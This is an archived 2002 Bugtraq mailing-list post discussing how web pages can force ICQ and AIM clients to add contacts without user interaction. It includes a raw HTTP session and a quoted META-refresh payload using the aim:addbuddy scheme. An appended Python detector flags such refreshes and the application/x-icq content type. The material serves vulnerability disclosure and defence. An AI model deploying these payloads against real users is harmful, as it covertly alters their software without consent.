Bugtraq mailing list archives
Re: AIM forced behavior "issue" Re:ICQ and MSIE allow execution of arbitrary code
From: "Bojidar Alexandrov" <bojo () kodar net>
Date: Thu, 18 Jul 2002 10:33:45 +0300
Knud,

This issue is still here, only the address that you use is no longer valid, because it has changed... At the end is the http session (for my icq, beware :)).

Also it seems that no one has paid attention to Jelmer's exploit for ICQ and MSIE. It must be examined thoroughly for other variants and a complete solution must be given to the community!

ATTENTION it is a HIGH security risk for clients - it works with almost any ICQ and IE, and ICQ must be installed in the default path, or a script to "guess" where, but anyway this is a very common case.

Http session for the icq:

GET http://wwp.icq.com/whitepages/add_me/?uin=71398287&action=add HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: bg,en-us;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Host: wwp.icq.com
Proxy-Connection: Keep-Alive

HTTP/1.0 200 OK
Date: Thu, 18 Jul 2002 07:12:12 GMT
Server: Apache/1.3.26 (Unix) mod_ssl/2.8.9 OpenSSL/0.9.6d
P3P: CP="ONL UNI COM PHY NAV INT DEM CURo OUR"
Content-Type: application/x-icq
Proxy-Connection: close

<!-- Vignette StoryServer 5.0 Thu Jul 18 03:12:12 2002 -->
[ICQ User]
UIN=71398287
Email=
NickName=
FirstName=
LastName=

----- Original Message -----
From: "Knud Erik Højgaard" <kain () egotrip dk>
To: "orb" <orb () mindflip org>; <bugtraq () securityfocus com>
Sent: Monday, July 16, 2001 11:44 PM
Subject: Re: AIM forced behavior "issue"
Example

<META HTTP-EQUIV="refresh" CONTENT=0;URL=aim:addbuddy?listofscreennames=mindfliporg,mfliporb,mflipmax,mflips0nic,mflipzorcon&groupname=mindfliporg>

A web page loaded with the above code in its META REFRESH tag would automatically add a group to the user's buddylist called mindfliporg and add buddies mindfliporg, mfliporb, mflipmax, mflips0nic, mflipzorcon to the group.

We tried some similar stuff with icq a while ago, live example at http://knudergud.dk/dev/icq.html .. it seems broken now, but the idea should be obvious. adding to a contact list using javascript, requiring no user interaction.. stupid software.

-Knud
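
Added example, not part of the original posts: a gateway-side check for the two delivery paths shown in this thread, a META refresh whose target is a non-web URI scheme such as aim:, and a response served as Content-Type: application/x-icq. The function, class and rule names and the sample inputs are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

WEB_SCHEMES = {"", "http", "https"}    # refresh targets that stay in the browser
HANDLER_MIME = {"application/x-icq"}   # Content-Type seen in the ICQ session above

class MetaRefresh(HTMLParser):
    """Collect the URL= target of every <META HTTP-EQUIV=refresh> tag."""
    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*(\S+)", a.get("content", ""), re.I)
            if m:
                self.targets.append(m.group(1).strip("'\""))

def scan_response(content_type, body):
    """Return findings for one HTTP response (header value + decoded body)."""
    findings = []
    mime = content_type.split(";")[0].strip().lower()
    if mime in HANDLER_MIME:
        # Body is handed to a desktop client instead of being rendered.
        findings.append({"rule": "client-handled-mime", "mime": mime})
    parser = MetaRefresh()
    parser.feed(body)
    for target in parser.targets:
        url = urlsplit(target)
        if url.scheme not in WEB_SCHEMES:
            # Automatic navigation into an external protocol handler.
            findings.append({"rule": "refresh-to-protocol-handler",
                             "scheme": url.scheme,
                             "action": url.path,
                             "params": parse_qs(url.query)})
    return findings

# Constructed samples modelled on the two cases in the thread.
AIM_PAGE = ('<html><head><META HTTP-EQUIV="refresh" '
            'CONTENT=0;URL=aim:addbuddy?listofscreennames=alice,bob&groupname=demo>'
            '</head></html>')
ICQ_BODY = "[ICQ User]\nUIN=0000000\nEmail=\nNickName=\n"
BENIGN = '<meta http-equiv="refresh" content="5; url=/home">'

if __name__ == "__main__":
    for ct, body in [("text/html", AIM_PAGE), ("application/x-icq", ICQ_BODY),
                     ("text/html", BENIGN)]:
        print(ct, scan_response(ct, body))
```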
